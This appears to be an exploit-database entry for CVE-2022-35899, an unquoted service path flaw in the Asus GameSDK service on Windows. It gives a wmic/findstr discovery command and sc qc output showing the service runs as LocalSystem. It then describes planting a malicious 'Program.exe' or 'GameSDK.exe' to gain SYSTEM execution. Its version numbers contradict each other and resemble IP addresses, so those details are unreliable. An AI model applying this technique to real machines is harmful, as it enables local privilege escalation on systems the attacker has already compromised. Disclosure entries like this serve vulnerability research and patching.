# Exploit Title: Asus GameSDK v188.8.131.52 - 'GameSDK.exe' Unquoted Service Path
# Date: 07/14/2022
# Exploit Author: Angelo Pio Amirante
# Version: 184.108.40.206
# Tested on: Windows 10
# Patched version: 220.127.116.11
# CVE: CVE-2022-35899
# Step to discover the unquoted service path:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# Info on the service:
C:\>sc qc "GameSDK Service"
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: GameSDK Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
TAG : 0
NOME_VISUALIZZATO : GameSDK Service
SERVICE_START_NAME : LocalSystem
If an attacker had already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS\" folder or in "C:\" , he could place his own "Program.exe" or "GameSDK.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "GameSDK.exe".